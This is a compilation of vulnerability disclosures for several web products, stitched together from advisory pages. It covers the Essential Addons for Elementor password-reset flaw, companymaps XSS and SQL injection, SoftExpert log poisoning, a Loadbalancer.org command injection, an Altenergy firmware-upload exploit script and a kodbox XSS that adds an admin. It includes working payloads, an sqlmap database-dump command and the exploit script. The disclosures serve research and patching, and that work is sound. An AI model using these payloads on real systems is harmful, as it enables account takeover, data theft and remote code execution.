A vulnerability classified as critical has been found in SourceCodester Lost and Found Information System 1.0. Affected is an unknown function of the file items/view.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-228888.

CVE-2023-2672

Improper Authentication vulnerability in WPDeveloper Essential Addons for Elementor allows Privilege Escalation. This issue affects Essential Addons for Elementor: from 5.4.0 through 5.7.1.

This blog post is about the Essential Addons for Elementor plugin vulnerability. If you’re a Essential Addons for Elementor user, please update the plugin to at least version **5.7.2**.

**Patchstack Developer and Business plan users are protected from the vulnerability.** You can also sign up for the Patchstack Community plan to be notified about vulnerabilities as soon as they become disclosed.

For plugin developers, we have security audit services and Threat Intelligence Feed API for hosting companies.

**About the Essential Addons for Elementor WordPress plugin**

The plugin Essential Addons for Elementor (versions >= **5.4.0** and <= **5.7.1**, free version), which has over 1 million active installations, is known as the most popular Elementor addons plugins in WordPress.

This WordPress plugin enhances the Elementor page building experience with 90+ creative elements and extensions. This plugin adds powers to our page builder using the easy-to-use elements those were designed to make our next WordPress page and posts design easier and prettier than ever before.

**The security vulnerability in Essential Addons for Elementor**

This plugin suffers from an unauthenticated privilege escalation vulnerability and allows any unauthenticated user to escalate their privilege to that of any user on the WordPress site.

It is possible to reset the password of any user as long as we know their username thus being able to reset the password of the administrator and login on their account. This vulnerability occurs because this password reset function does not validate a password reset key and instead directly changes the password of the given user. The described vulnerability was fixed in version **5.7.2** and assigned **CVE-2023-32243**.

Find out more from the Patchstack database

The start of discovering this vulnerability came from observing the init hook located in the register_hooks function:

    // Login | Register
    add_action('init', [$this, 'login_or_register_user']);

Let’s see the login_or_register_user function that will be triggered:

    public function login_or_register_user() {
        do_action( 'eael/login-register/before-processing-login-register', $_POST );
        // login or register form?
        if ( isset( $_POST['eael-login-submit'] ) ) {
            $this->log_user_in();
        } else if ( isset( $_POST['eael-register-submit'] ) ) {
            $this->register_user();
        } else if ( isset( $_POST['eael-lostpassword-submit'] ) ) {
            $this->send_password_reset();
        } else if ( isset( $_POST['eael-resetpassword-submit'] ) ) {
            $this->reset_password();
        }
        do_action( 'eael/login-register/after-processing-login-register', $_POST );
    
    }

The function will perform a couple of checks if certain $_POST parameter are set and will call the corresponding function. The underlying vulnerability is located in the reset_password function. Based on the official commit, the affected function only exists starting from version **5.4.0**.

    public function reset_password() {
        $ajax   = wp_doing_ajax();
        $page_id = 0;
        if ( ! empty( $_POST['page_id'] ) ) {
            $page_id = intval( $_POST['page_id'], 10 );
        } else {
            $err_msg = esc_html__( 'Page ID is missing', 'essential-addons-for-elementor-lite' );
        }
    
        $widget_id = 0;
        if ( ! empty( $_POST['widget_id'] ) ) {
            $widget_id = sanitize_text_field( $_POST['widget_id'] );
        } else {
            $err_msg = esc_html__( 'Widget ID is missing', 'essential-addons-for-elementor-lite' );
        }
    
        $rp_data = [
            'rp_key' => ! empty( $_POST['rp_key'] ) ? sanitize_text_field( $_POST['rp_key'] ) : '',
            'rp_login' => ! empty( $_POST['rp_login'] ) ? sanitize_text_field( $_POST['rp_login'] ) : '',
        ];
    
        update_option( 'eael_resetpassword_rp_data_' . esc_attr( $widget_id ), maybe_serialize( $rp_data ), false );
    
        update_option( 'eael_show_reset_password_on_form_submit_' . $widget_id, true, false );
    
        if (!empty( $err_msg )){
            if ( $ajax ) {
                wp_send_json_error( $err_msg );
            }
            update_option( 'eael_resetpassword_error_' . $widget_id, $err_msg, false );
    
            if (isset($_SERVER['HTTP_REFERER'])) {
                wp_safe_redirect($_SERVER['HTTP_REFERER']);
                exit();
            }
        }
    
        if ( empty( $_POST['eael-resetpassword-nonce'] ) ) {
            $err_msg = esc_html__( 'Insecure form submitted without security token', 'essential-addons-for-elementor-lite' );
            if ( $ajax ) {
                wp_send_json_error( $err_msg );
            }
            update_option( 'eael_resetpassword_error_' . $widget_id, $err_msg, false );
    
            if (isset($_SERVER['HTTP_REFERER'])) {
                wp_safe_redirect($_SERVER['HTTP_REFERER']);
                exit();
            }
        }
        if ( ! wp_verify_nonce( $_POST['eael-resetpassword-nonce'], 'essential-addons-elementor' ) ) {
            $err_msg = esc_html__( 'Security token did not match', 'essential-addons-for-elementor-lite' );
            if ( $ajax ) {
                wp_send_json_error( $err_msg );
            }
            update_option( 'eael_resetpassword_error_' . $widget_id, $err_msg, false );
    
            if (isset($_SERVER['HTTP_REFERER'])) {
                wp_safe_redirect($_SERVER['HTTP_REFERER']);
                exit();
            }
        }
        $settings = $this->lr_get_widget_settings( $page_id, $widget_id);
    
        if ( is_user_logged_in() ) {
            $err_msg = isset( $settings['err_loggedin'] ) ? __( Helper::eael_wp_kses( $settings['err_loggedin'] ), 'essential-addons-for-elementor-lite' ) : esc_html__( 'You are already logged in', 'essential-addons-for-elementor-lite' );
            if ( $ajax ) {
                wp_send_json_error( $err_msg );
            }
            update_option( 'eael_resetpassword_error_' . $widget_id, $err_msg, false );
    
            if (isset($_SERVER['HTTP_REFERER'])) {
                wp_safe_redirect($_SERVER['HTTP_REFERER']);
                exit();
            }
        }
    
        do_action( 'eael/login-register/before-resetpassword-email' );
    
        $widget_id = ! empty( $_POST['widget_id'] ) ? sanitize_text_field( $_POST['widget_id'] ) : '';
    
        // Check if password is one or all empty spaces.
        $errors = [];
        if ( ! empty( $_POST['eael-pass1'] ) ) {
            $post_eael_pass1 = trim( $_POST['eael-pass1'] );
    
            if ( empty( $post_eael_pass1 ) ) {
                $errors['password_reset_empty_space'] = isset( $settings['err_pass'] ) ? __( Helper::eael_wp_kses( $settings['err_pass'] ), 'essential-addons-for-elementor-lite' ) : esc_html__( 'The password cannot be a space or all spaces.', 'essential-addons-for-elementor-lite' );
            }
        } else {
            if ( empty( $_POST['eael-pass1'] ) ) {
                $errors['password_reset_empty_space'] = isset( $settings['err_pass'] ) ? __( Helper::eael_wp_kses( $settings['err_pass'] ), 'essential-addons-for-elementor-lite' ) : esc_html__( 'The password cannot be a space or all spaces.', 'essential-addons-for-elementor-lite' );
            }
        }
    
        if( ! empty( $_POST['eael-pass1'] ) && strlen( trim( $_POST['eael-pass1'] ) ) == 0 ){
            $errors['password_reset_empty'] = esc_html__( 'The password cannot be empty.', 'essential-addons-for-elementor-lite' );
        }
        
        // Check if password fields do not match.
        if ( ! empty( $_POST['eael-pass1'] ) && $_POST['eael-pass2'] !== $_POST['eael-pass1'] ) {
            $errors['password_reset_mismatch'] = isset( $settings['err_conf_pass'] ) ? __( Helper::eael_wp_kses( $settings['err_conf_pass'] ), 'essential-addons-for-elementor-lite' ) : esc_html__( 'The passwords do not match.', 'essential-addons-for-elementor-lite' );
        }
    
        if ( ( ! count( $errors ) ) && isset( $_POST['eael-pass1'] ) && ! empty( $_POST['eael-pass1'] ) ) {
            $rp_login = isset( $_POST['rp_login']) ? sanitize_text_field( $_POST['rp_login'] ) : '';
            $user = get_user_by( 'login', $rp_login );
            
            if( $user || ! is_wp_error( $user ) ){
                reset_password( $user, sanitize_text_field( $_POST['eael-pass1'] ) );
    -----------------------------------------------------------------------------------

First, we need to set a random value in $_POST['page_id'] and $_POST['widget_id'] so the $err_msg is not set. We also need to set $_POST['eael-resetpassword-nonce'] since the nonce value will be verified on the code. In order to set the password, we need to supply the same password string to $_POST['eael-pass1'] and $_POST['eael-pass2'] since it will be checked.

If we already pass all of above condition, the code will construct a $rp_login variable from $_POST['rp_login']. The code then will construct a $user object using the get\_user\_by function by searching the login (username) value that match the $rp_login variable.

If the $user object exists and there is no error, the code will directly reset the users’ password using the reset\_password function.

At this point the question is perhaps how we can get our hands on the essential-addons-elementor nonce value. Turns out that this nonce value is present in the main front-end page of the WordPress site since it will be set in the $this->localize_objects variable by the load_commnon_asset function:

    // localize object
    $this->localize_objects = apply_filters( 'eael/localize_objects', [
        'ajaxurl'            => admin_url( 'admin-ajax.php' ),
        'nonce'              => wp_create_nonce( 'essential-addons-elementor' ),

The $this->localize_objects variable will be used as the object on the wp\_localize\_script call in the frontend_asset_load function:

    public function frontend_asset_load() {
        $handle        = 'eael';
        $this->post_id = get_the_ID();
    
        $this->elements_manager->get_element_list( $this->post_id );
        $this->load_commnon_asset();
        $this->register_script();
    
    -------------------- CUTTED HERE ------------------------------------
    
        wp_localize_script( $handle, 'localize', $this->localize_objects );
    }

The function eventually will be called from init_hook and it will be set as a function handler of wp\_enqueue\_scripts hook that will display all of the enqueued scripts and styles.

    protected function init_hook() {
        add_action( 'wp_footer', [ $this, 'add_inline_js' ], 100 );
        add_action( 'wp_footer', [ $this, 'add_inline_css' ], 15 );
        add_action( 'after_delete_post', [ $this, 'delete_cache_data' ] );
    
        add_action( 'wp_enqueue_scripts', [ $this, 'frontend_asset_load' ], 100 );
        add_action( 'elementor/frontend/before_enqueue_styles', [ $this, 'ea_before_enqueue_styles' ] );
        add_action( 'elementor/theme/register_locations', [ $this, 'load_asset_per_location' ], 20 );
        add_filter( 'elementor/files/file_name', [ $this, 'load_asset_per_file' ] );
    }

Note that this vulnerability could be triggered on a default installation or configuration of the Essential Addons for Elementor plugin.

**The patch in Essential Addons for Elementor**

Since this vulnerability exists because the code directly resets a user password without properly checking if the password reset key is present and legitimate, the patch is pretty straight forward. The vendor decide to use the eael_resetpassword_rp_data_* value configured from eael_redirect_to_reset_password function to validate the reset password process. The patch can be seen below.

**Conclusion**

Keep in mind that unauthenticated users can execute the init and also admin\_init hooks on WordPress, so we need to add a proper access control and nonce check to the function handler if it contains a certain action that performs something that interacts with the database.

Also pay extra attention to anything that is related to the login, registration and password reset/recovery process. We highly recommend utilizing the check\_password\_reset\_key function to check for the reset password key.

**Disclosure timeline of the vulnerability**

**08 May, 2023** – We found the vulnerability and reached out to the plugin vendor.  
**11 May, 2023** – Essential Addons for Elementor version **5.7.2** was published to patch the reported issues.  
******11 May, 2023****** – Added the vulnerabilities to the Patchstack vulnerability database.  
******11 May, 2023****** – Published the article.

_Since we’ve detected that third-parties have had access to the vulnerability information via monitoring the changelog and have made the issue public, we’ve decided to disclose the vulnerability early._

**Help us make the Internet a safer place**

Making the WordPress ecosystem more secure is a team effort, and we believe that plugin developers and security researchers should work together.

*   If you’re a **plugin developer**, join our mVDP program that makes it easier to report, manage and address vulnerabilities in your software.
*   If you’re a **security researcher**, join Patchstack Alliance to report vulnerabilities & earn rewards.

CVE-2023-32243: 1+ Million Sites Affected by Critical Privilege Escalation Vulnerability in Essential Addons for Elementor Plugin

Cross Site Scripting (XSS) vulnerability in vogtmh cmaps (companymaps) 8.0 allows attackers to execute arbitrary code.

    # Exploit Title: Reflected Cross Site Scripting- Google Dork:- Date: 27.04.2023- Exploit Author: Lucas Noki (0xPrototype)- Vendor Homepage: https://github.com/vogtmh- Software Link: https://github.com/vogtmh/cmaps- Version: 8.0- Tested on: Mac, Windows, Linux- CVE : CVE-2023-29808*Description:*The vulnerability found is Reflected Cross Site Scripting. When the `/index.php?map=overview&findme=` endpoint is hit with a request where the "findme" parameter contains a malicious payload we have the possibility to perform an XSS attack. This happens because the input isn't sanitized.*Steps to reproduce:*1. Clone the repository and install the application2. Send a maliciously crafted payload via the "findme" parameter to the following endpoint: /index.php?map=overview&findme=3. The payload used is: ";alert(document.cookie)//4. Simply visiting the complete URL: http://IP/index.php?map=overview&findme=";alert(document.cookie)// is enough. Now an alertbox should pop up with your current cookie value. <img src="Screenshot 2023-05-03 at 17.56.59.png" alt="Screenshot 2023-05-03 at 17.56.59" style="zoom:50%;" />Special thanks goes out to iCaotix who greatly helped me in getting the environment setup as well as debugging my payload.

CVE-2023-29808: Companymaps 8.0 Cross Site Scripting ≈ Packet Storm

SQL injection vulnerability found in Maximilian Vogt companymaps (cmaps) v.8.0 allows a remote attacker to execute arbitrary code via a crafted script in the request.

# Exploit Title: Unauthenticated SQL injection  
- Google Dork:  
- Date: 27.04.2023  
- Exploit Author: Lucas Noki (0xPrototype)  
- Vendor Homepage: https://github.com/vogtmh  
- Software Link: https://github.com/vogtmh/cmaps  
- Version: 8.0  
- Tested on: Mac, Windows, Linux  
- CVE : CVE-2023-29809

*Description:*

The vulnerability found is an SQL injection. The `bookmap` parameter is vulnerable. When visiting the page: http://192.168.0.56/rest/booking/index.php?mode=list&bookmap=test we get the normal JSON response. However if a single quote gets appended to the value of the `bookmap` parameter we get an error message:  
```html  
<b>Warning</b>: mysqli_num_rows() expects parameter 1 to be mysqli_result, bool given in <b>/var/www/html/rest/booking/index.php</b> on line <b>152</b><br />  
```

Now if two single quotes get appended we get the normal response without an error. This confirms the opportunity for sql injection. To really prove the SQL injection we append the following payload:   
```  
'-(select*from(select+sleep(2)+from+dual)a)--+  
```

The page will sleep for two seconds. This confirms the SQL injection.

*Steps to reproduce:*

1. Send the following payload to test the vulnerability: ```'-(select*from(select+sleep(2)+from+dual)a)--+```

2. If the site slept for two seconds run the following sqlmap command to dump the whole database including the ldap credentials.  
   ```shell  
   python3 sqlmap.py -u "http://<IP>/rest/booking/index.php?mode=list&bookmap=test*" --random-agent --level 5 --risk 3 --batch --timeout=10 --drop-set-cookie -o --dump  
   ```

Special thanks goes out to iCaotix who greatly helped me in getting the environment setup as well as debugging my payload.

## Request to the server:

<img src="Screenshot 2023-04-30 at 22.23.51.png" alt="Screenshot 2023-04-30 at 22.23.51" style="zoom:50%;" />

## Response from the server:

Look at the response time.

<img src="Screenshot 2023-04-30 at 22.24.35.png" alt="Screenshot 2023-04-30 at 22.24.35" style="zoom:50%;" />

CVE-2023-29809: Companymaps 8.0 SQL Injection ≈ Packet Storm

SoftExpert (SE) Excellence Suite 2.x versions before 2.1.3 is vulnerable to Local File Inclusion in the function /se/v42300/generic/gn_defaultframe/2.0/defaultframe_filter.php.

**Remote Code Execution in SoftExpert Excellence Suite 2.0 - CVE-2023-30330**

Authenticated Local File Inclusion to Remote Code Execution on SoftExpert Excellence Suite EQM.

CVE-2023-30330

*   SE Suite 2.x versions before 2.1.3
*   Tested on versions: 2.0.15.31 and 2.0.15.115

**LFI PoC**

https://github.com/Filiplain/LFI-to-RCE-SE-Suite-2.0/tree/main/PoC

**1- Local File Inclusion:**

The researcher was able to find a PHP function **"/se/v42300/generic/gn\_defaultframe/2.0/defaultframe\_filter.php"** that includes a file with extension **".inc"** in a base64 encoding format through the **“managerPath”** parameter in a POST request. By changing the **“.inc”** file to for example **“C:\\windows\\win.ini”** and converting it back to base64, we are going to get that file on the system.

 

The PHP file **"defaultframe\_filter.php"** is using the function “require\_once()” to include the files, this function could allow a hacker to execute Remote Code Execution by including poisoned logs.

**2- Remote Code Execution:**

*   We can include and read PHP error logs.
*   We can use require\_once() to execute PHP code.
*   We need to insert PHP code into the error logs.

By analyzing the **“user\_action.php”** function when uploading a new profile picture, we can notice that when you upload an invalid or malicious image, the page will throw an error 401. After causing the error you can read the logs again and see that some parameters like the “Referer” header will be logged, knowing this we can inject PHP code into the **“Referer”** header.

After trying to upload the malicious image and injecting PHP code into the Referer, we can confirm the log poisoning by reading the logs.

Now we can execute commands by reading the logs. **Command:** whoami

CVE-2023-30330: GitHub - Filiplain/LFI-to-RCE-SE-Suite-2.0: Authenticated Local File Inclusion to Remote Code Execution on SoftExpert Suite EQM.

Loadbalancer.org Enterprise VA MAX through 8.3.8 has an OS Command Injection vulnerability that allows a remote authenticated attacker to execute arbitrary code.

Vulnerability: OS Command Injection

OS Command Injection in Loadbalancer.org Appliance v8.3.8-134

Vendor: Loadbalancer.org, https://www.loadbalancer.org

Product: ENTERPRISE VA MAX

Version affected: Loadbalancer.org Appliance v8.3.8 as the latest in October 2019

**Product description:**

“Loadbalancer.org is a well-established international provider of reliable, versatile and cost-effective application delivery products and services. The load balancer experts help solve the issues of availability and scalability by providing an unbreakable solution to ensure zero downtime of critical IT applications.

Loadbalancer.org’s consultancy led approach means they have specialist engineers that will help design and simplify architecture guaranteeing painless deployments every single time. The team of experts are effortlessly able to set up test environments, document each deployment, provide customized solutions and assist with complex migrations. They will support a business, not just the load balancer!

Loadbalancer.org load balancers are sold as hardware, virtual or cloud formats and are more scalable, flexible and are economical compared to competitive offerings. With no performance or feature restrictions, their suite of products can load balance any application, for any company, in any industry, anywhere in the world.

Allowing customers to have direct access 24 hours a day 7 days a week to a team of passionate engineers via phone, online chat and e-mail sets Loadbalancer.org apart from other ADC vendors.

” as per statement on https://www.linkedin.com/company/loadbalancer-org website.

*   CVE ID: CVE-2020-13378
*   CWE ID: CWE-78

**Proof of Concept**

A command Injection vulnerability allows attackers to execute arbitrary OS commands via a crafted HTTP request. This is exploitable by an authenticated attacker who submits a modified GET request.

Sample GET request, issuing ‘id’ OS command returns ‘uid=48(apache)’

Identified vulnerable parameters: waf\_filename

**Request:**

    GET /lbadmin/ajax/js_dispatcher.php?option=waf_log&waf_filename=modsec_audit.log%7c%60id%60&log_option=base HTTP/1.1
    Host: 10.0.0.99:9443
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0
    Accept: */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    X-Requested-With: XMLHttpRequest
    Authorization: Basic aW5mZ[...]TEw
    Connection: close
    Cookie: menu=log%2Flaw; hiderestartwarning=0
    
    
    HTTP/1.1 200 OK
    Date: Thu, 03 Oct 2019 11:38:17 GMT
    Server: Apache
    Content-Length: 800
    Connection: close
    Content-Type: text/html; charset=UTF-8
    
    
    <div class="exception"><h2>Exception LBFileError:</h2><p><em>Please report the full text of this exception to <a href="mailto:support@loadbalancer.org">Loadbalancer.org Support</a>, together with brief details of the operation you were performing.</em></p>
    <p><em>Thank you.</em></p><p><pre>ensure_access(): &#039;chown  --no-dereference root:apache /var/log/httpd/modsec_audit.log|`id`&#039; failed: errno 127, sh: uid=48(apache): command not found</pre></p><h3>Trace:</h3>
    <p><pre>#0 /var/www/html/lbadmin/inc/waf.inc(1878): ensure_access(&#039;/var/log/httpd/...&#039;)
    #1 /var/www/html/lbadmin/inc/js_dispatch_func_call.inc(62): load_waf_log_file(&#039;modsec_audit.lo...&#039;, &#039;base&#039;)
    #2 /var/www/html/lbadmin/ajax/js_dispatcher.php(70): get_waf_log(Array)
    #3 {main}</pre></p></div>

**Public searches:**

https://www.zoomeye.org/searchResult?q=Loadbalancer%2Corg

https://www.shodan.io/search?query=loadbalancer.org

but this company has interestingly some reputable partnership alliance

**References**

1.  https://www.immuniweb.com/vulnerability/os-command-injection.html
2.  https://www.loadbalancer.org
3.  https://cwe.mitre.org/data/definitions/78.html
4.  https://www.checkmarx.com/knowledge/knowledgebase/OS-Command\_Injection

CVE-2020-13378: OS Command Injection in Enterprise loadbalancer VA MAX - v8.3.8 and earlier

A cross-site scripting (XSS) vulnerability in PrestaShop v1.7.7.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the message parameter in /contactform/contactform.php.

**PrestaShop Cross-site Scripting vulnerability**

Moderate severity GitHub Reviewed Published May 12, 2023 to the GitHub Advisory Database • Updated May 12, 2023

GHSA-6mhc-hqr3-w466: PrestaShop Cross-site Scripting vulnerability

Altenergy Power Control Software C1.2.5 was discovered to contain a remote code execution (RCE) vulnerability via the component /models/management_model.php.

**title : insufficient verification of firmware integrity "Altenergy Power Control Software" led to RCE****SW ver: C1.2.5****Vendor: https://apsystems.com/****Google Dork: intitle:"Altenergy Power Control Software"****Affected device: ENERGY COMMUNICATION UNIT**

**POC Video :**

**vulnerable code :**

"/home/local\_web/pagesapplication/models/management\_model.php"

 public function exec\_upgrade\_ecu()
    {
        $results = array();
        $res\_array = array();

        exec("rm -rf /tmp/update\_localweb/");
        if ($\_FILES\["file"\]\["error"\] > 0)
        {
            array\_push($res\_array, "Return Code: " . $\_FILES\["file"\]\["error"\] . "<br />");
            $results\["value"\] = 1;
        }
        else
        {
            array\_push($res\_array, "Upload: " . $\_FILES\["file"\]\["name"\] . "<br />");
            array\_push($res\_array, "Type: " . $\_FILES\["file"\]\["type"\] . "<br />");
            array\_push($res\_array, "Size: " . ($\_FILES\["file"\]\["size"\] / 1024) . " Kb<br />");
            array\_push($res\_array, "Temp file: " . $\_FILES\["file"\]\["tmp\_name"\] . "<br />");        

            move\_uploaded\_file($\_FILES\["file"\]\["tmp\_name"\], "/tmp/" . $\_FILES\["file"\]\["name"\]);
            array\_push($res\_array, "Stored in: " . "/tmp/" . $\_FILES\["file"\]\["name"\]);
            exec("tar xjvf /tmp/".$\_FILES\["file"\]\["name"\]." -C /tmp");
            exec("ls /tmp/update\_localweb/assist", $temp, $value);
            exec("/tmp/update\_localweb/assist &");
            $results\["value"\] = $value ? 1 : 0;
        }

        $results\["result"\] = implode("\\n",$res\_array);
        return $results;
    }

**Exploit :**

exploit.sh

#!/bin/bash
mkdir update\_localweb 2>/dev/null
payload='ping -c 1 ahvmb8ham4hkik6ifzt7o8puyl4hs6.burpcollaborator.net'
echo $payload \> update\_localweb/assist
chmod 777 update\_localweb/assist
tar cjvf b4db0t.bin update\_localweb/
rm -rf update\_localweb 

Browse to http://<IP\_ADDR>/index.php/management/upgrade\_ecu and upload b4db0t.bin POC :

CVE-2023-31502: Disclosures/Insufficient_Verification_of_Data_Authenticity.MD at main · ahmedalroky/Disclosures

**PRESTA-SHOP 1.7.7.4 REFLECTED CROSS SITE SCRIPTING**

Vulnerable Parameter: message

XSS Payload : %3cimg+src+onerror%3dprompt%288%29%3e

<Vendor> : https://www.prestashop.com/

**Vulnerable Code Part**

Default File Path

> /modules/contactform/contactform.php 

> Note: Some parameters have been changed by the company using the application.

**Description**

The PrestaShop web application lead the message value without any sanitization on contact-form .The attacker could be inject xss payload with changes the HTTP 'post' request to Http 'get' request for exploitation. That Exploitation shown belows.

**Http Request-Response**

CVE-2023-31508: Research/ReflectedXSS_1.7.7.4.md at main · mustgundogdu/Research

kodbox <= 1.37 is vulnerable to Cross Site Scripting (XSS) via the debug information.

English version

**0x01 Vulnerability Description**

Reflective xss vulnerability caused by debug information

**0x02 Affected version**

kodbox<=V1.39

**0x03 Vulnerability recurrence**

Triggering conditions

*   Turn off csrf protection
*   Administrator privileges

Turn off csrf protection steps

Desktop->System settings->Basic->Security->Enable csrf protection (OFF)

Then construct the link to trigger xss

    http://target.com/?API_ROUTE=admin%2Fshare%2Fget&type=<embed%20src%3d"data%3atext%2fhtml%3bbase64%2c%20PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4%3d">
    

Here construct a poc to add an administrator, because csrf is closed, here directly send a get request to add an administrator through the img tag, the added account is testu and the password is testuser

       <img src="/?API_ROUTE=admin/member/add%26name=testuser%26nickName=testu%26password=testuser%26addMore=base%26roleID=3%26groupInfo=%7B%221%22%3A%221%22%7D%26sizeMax=0%26sizeUse=0" style='display:none'>
    

full link, visit

    http://target.com/?API_ROUTE=admin/share/get&type=<img%20src="/?API_ROUTE=admin/member/add%26name=testuser%26nickName=testu%26password=testuser%26addMore=base%26roleID=3%26groupInfo=%7B"1"%3A"1"%7D%26sizeMax=0%26sizeUse=0"%20style=%27display:none%27>
    

Successfully created an admin user

*   **本文作者：**Juneha
*   **本文链接：**https://blog.mo60.cn/index.php/archives/kodbox-xss.html
*   **版权声明：**本博客所有文章除特别声明外，均默认采用 **CC BY-NC-SA 4.0** 许可协议。
*   **文章声明：**文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由用户承担全部法律及连带责任，文章作者不承担任何法律及连带责任，本人坚决反对利用文章内容进行恶意攻击行为，推荐大家在了解技术原理的前提下，更好的维护个人信息安全、企业安全、国家安全。

如果觉得我的文章对你有用，请随意赞赏,可备注留下ID方便感谢

Tag

#php